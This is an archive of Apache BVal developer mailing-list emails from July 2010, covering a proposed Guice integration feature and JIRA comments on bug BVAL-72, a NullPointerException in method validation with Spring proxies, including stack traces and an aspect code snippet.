In-Reply-To: <[email protected]> References: <[email protected]> Date: Thu, 1 Jul 2010 17:40:07 +0200 Message-ID: <[email protected]> Subject: Re: Evolving the guice integration From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi all guys, since there are no objections, I'm going to implement that new feature. Have a nice day!!! Simo http://people.apache.org/~simonetripodi/ http://www.99soft.org/ On Mon, Jun 28, 2010 at 3:53 PM, Simone Tripodi <[email protected]> wrote: > Hi all mates, > I'm currently using the guice integration module in a non-opensource > project and I just had a need that could become part of the framework, > I mean the interceptor should be able to re-throw the > ConstraintViolationException as a new Exception defined in the the > @Validate annotation, a possible use case could be in the JAX-RS > integration: > > =C2=A0 =C2=A0@GET > =C2=A0 =C2=A0@Produces(MediaType.APPLICATION_XML) > =C2=A0 =C2=A0@Path("ip-country") > =C2=A0 =C2=A0@Validate(rethrowExceptionsAs =3D javax.ws.rs.WebApplication= Exception.class) > =C2=A0 =C2=A0public List<IpRange> getIpRangesByCountry(@NotEmpty @NotNull > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0@QueryParam("countryCode") > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0final List<String> countryCode) = { > =C2=A0 =C2=A0 =C2=A0 =C2=A0... do something > =C2=A0 =C2=A0} > > What do you think about it? I've already done the same thing with > ibatis-guice integration and if you agree I'm able to provide it in a > while. > Many thanks in advance, have a nice day > Simo > > http://people.apache.org/~simonetripodi/ > http://www.99soft.org/ > From [email protected] Thu Jul 01 16:18:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89360 invoked from network); 1 Jul 2010 16:18:16 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Jul 2010 16:18:16 -0000 Received: (qmail 98379 invoked by uid 500); 1 Jul 2010 16:18:16 -0000 Delivered-To: [email protected] Received: (qmail 98350 invoked by uid 500); 1 Jul 2010 16:18:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98341 invoked by uid 99); 1 Jul 2010 16:18:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 16:18:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jul 2010 16:18:12 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o61GHohr029277 for <[email protected]>; Thu, 1 Jul 2010 16:17:50 GMT Message-ID: <1190281.155861278001070319.JavaMail.jira@thor> Date: Thu, 1 Jul 2010 12:17:50 -0400 (EDT) From: "David J. M. Karlsen (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12884334#action_12884334 ] David J. M. Karlsen commented on BVAL-72: ----------------------------------------- Unfortunately I can't free the code. I can however provide some debugging info: {noformat} MethodDescriptorImpl methodDescriptor = (MethodDescriptorImpl) beanDesc.getConstraintsForMethod(method); methodDescriptor is null so that the next line return validateParameters(methodDescriptor.getMetaBean(), methodDescriptor.getParameterDescriptors(), parameters, groupArray); will NPE (maybe it should be more robust?) {noformat} The method object in the aspect is: public abstract UserType com.edb.payment.pays.core.service.user.UserService.findUser(java.lang.String,java.lang.String,java.lang.String) Which is the interface method (note the abstract - it's also missing the annotations). Should the interface or the implementing class be annotated - or shouldn't it matter? The before aspect: (The target type is the actual class implementing the interface.) {noformat} @Before("anyPublicMethodExecution() && withinCoreLayer()") public void validate( JoinPoint joinPoint ) throws ValidationException { MethodSignature methodSignature = (MethodSignature) joinPoint.getSignature(); MethodValidator methodValidator = getMethodValidator(); Class<?> clazz = joinPoint.getTarget().getClass(); Method method = methodSignature.getMethod(); Object[] args = joinPoint.getArgs(); logger.trace( "Validating method {} on target {} passed args {}", new Object[] { clazz, method, args } ); Set<? extends ConstraintViolation<?>> validationErrors = methodValidator.validateParameters( clazz, method, args ); if ( !validationErrors.isEmpty() ) { throw new ValidationException( validationErrors ); } } {noformat} If you really need it I can create a case which looks the same but on code which can be freed - please ping back. > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 02 18:54:18 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42040 invoked from network); 2 Jul 2010 18:54:18 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 2 Jul 2010 18:54:18 -0000 Received: (qmail 64744 invoked by uid 500); 2 Jul 2010 18:54:18 -0000 Delivered-To: [email protected] Received: (qmail 64705 invoked by uid 500); 2 Jul 2010 18:54:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64692 invoked by uid 99); 2 Jul 2010 18:54:17 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Jul 2010 18:54:17 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Jul 2010 18:54:14 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o62Irqjh012583 for <[email protected]>; Fri, 2 Jul 2010 18:53:52 GMT Message-ID: <17924172.178831278096832263.JavaMail.jira@thor> Date: Fri, 2 Jul 2010 14:53:52 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12884778#action_12884778 ] Carlos Vara commented on BVAL-72: --------------------------------- Ok, I will try to replicate the scenario this weekend. Just a quick note, you are using spring's proxies to get your aspects to work right? Regarding the robustness of the null pointer check, checking for null there is easy, but I would like to investigate on whether we can actually parse the annotated parameters when given a proxy object so it can actually be validated. > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Jul 04 19:40:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5958 invoked from network); 4 Jul 2010 19:40:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Jul 2010 19:40:15 -0000 Received: (qmail 14673 invoked by uid 500); 4 Jul 2010 19:40:15 -0000 Delivered-To: [email protected] Received: (qmail 14644 invoked by uid 500); 4 Jul 2010 19:40:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14636 invoked by uid 99); 4 Jul 2010 19:40:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jul 2010 19:40:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jul 2010 19:40:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o64JdomW001219 for <[email protected]>; Sun, 4 Jul 2010 19:39:50 GMT Message-ID: <14499134.194961278272389996.JavaMail.jira@thor> Date: Sun, 4 Jul 2010 15:39:49 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12885071#action_12885071 ] Carlos Vara commented on BVAL-72: --------------------------------- I managed to replicate the problem. I will keep you updated on the progress. > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at org.junit.runners.ParentRunner.access$000(ParentRunner.java:42) > at org.junit.runners.ParentRunner$2.evaluate(ParentRunner.java:184) > at org.springframework.test.context.junit4.statements.RunBeforeTestClassCallbacks.evaluate(RunBeforeTestClassCallbacks.java:61) > at org.springframework.test.context.junit4.statements.RunAfterTestClassCallbacks.evaluate(RunAfterTestClassCallbacks.java:70) > at org.junit.runners.ParentRunner.run(ParentRunner.java:236) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.run(SpringJUnit4ClassRunner.java:180) > at org.eclipse.jdt.internal.junit4.runner.JUnit4TestReference.run(JUnit4TestReference.java:49) > at org.eclipse.jdt.internal.junit.runner.TestExecution.run(TestExecution.java:38) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:467) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.runTests(RemoteTestRunner.java:683) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.run(RemoteTestRunner.java:390) > at org.eclipse.jdt.internal.junit.runner.RemoteTestRunner.main(RemoteTestRunner.java:197) > {noformat} -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Jul 04 19:42:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6143 invoked from network); 4 Jul 2010 19:42:15 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 4 Jul 2010 19:42:15 -0000 Received: (qmail 14888 invoked by uid 500); 4 Jul 2010 19:42:15 -0000 Delivered-To: [email protected] Received: (qmail 14847 invoked by uid 500); 4 Jul 2010 19:42:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14839 invoked by uid 99); 4 Jul 2010 19:42:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jul 2010 19:42:15 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jul 2010 19:42:12 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o64JfoPa001228 for <[email protected]>; Sun, 4 Jul 2010 19:41:50 GMT Message-ID: <14703961.194991278272510851.JavaMail.jira@thor> Date: Sun, 4 Jul 2010 15:41:50 -0400 (EDT) From: "Carlos Vara (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Assigned: (BVAL-72) NPE when doing methodvalidation In-Reply-To: <18948177.122061277844170577.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-72?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Carlos Vara reassigned BVAL-72: ------------------------------- Assignee: Carlos Vara > NPE when doing methodvalidation > ------------------------------- > > Key: BVAL-72 > URL: https://issues.apache.org/jira/browse/BVAL-72 > Project: BeanValidation > Issue Type: Bug > Components: jsr303 > Affects Versions: 0.2-incubating > Environment: JDK 1.5, spring 3.0.3 > Reporter: David J. M. Karlsen > Assignee: Carlos Vara > > I get an npe when calling this annotated method (the annotations are on the implementation class - not on the interface): > findUser( @Size( min=1 ) String param1, > @NotNull String param2, > @NotNull SomeClass param3 ) > It ends up not findin a MethodDescriptor, this it's null when attempting to call method validation. > {noformat} > java.lang.NullPointerException > at org.apache.bval.jsr303.extensions.MethodValidatorImpl.validateParameters(MethodValidatorImpl.java:86) > at com.edb.payment.pays.core.util.aop.validation.ValidationAspect.validate(ValidationAspect.java:67) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethodWithGivenArgs(AbstractAspectJAdvice.java:621) > at org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod(AbstractAspectJAdvice.java:603) > at org.springframework.aop.aspectj.AspectJMethodBeforeAdvice.before(AspectJMethodBeforeAdvice.java:39) > at org.springframework.aop.framework.adapter.MethodBeforeAdviceInterceptor.invoke(MethodBeforeAdviceInterceptor.java:49) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:110) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.interceptor.ExposeInvocationInterceptor.invoke(ExposeInvocationInterceptor.java:89) > at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172) > at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202) > at $Proxy21.findUser(Unknown Source) > at com.edb.payment.pays.core.service.user.UserServiceImplTest.findUserThatExists(UserServiceImplTest.java:27) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) > at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) > at java.lang.reflect.Method.invoke(Method.java:592) > at org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:44) > at org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:15) > at org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:41) > at org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:20) > at org.springframework.test.context.junit4.statements.RunBeforeTestMethodCallbacks.evaluate(RunBeforeTestMethodCallbacks.java:74) > at org.springframework.test.context.junit4.statements.RunAfterTestMethodCallbacks.evaluate(RunAfterTestMethodCallbacks.java:82) > at org.springframework.test.context.junit4.statements.SpringRepeat.evaluate(SpringRepeat.java:72) > at org.springframework.test.context.junit4.SpringJUnit4ClassRunner.runChild(SpringJUnit4ClassRunner.java:240) > at org.junit.runners.BlockJUnit4ClassRunner.runChild(BlockJUnit4ClassRunner.java:50) > at org.junit.runners.ParentRunner$3.run(ParentRunner.java:193) > at org.junit.runners.ParentRunner$1.schedule(ParentRunner.java:52) > at org.junit.runners.ParentRunner.runChildren(ParentRunner.java:191) > at 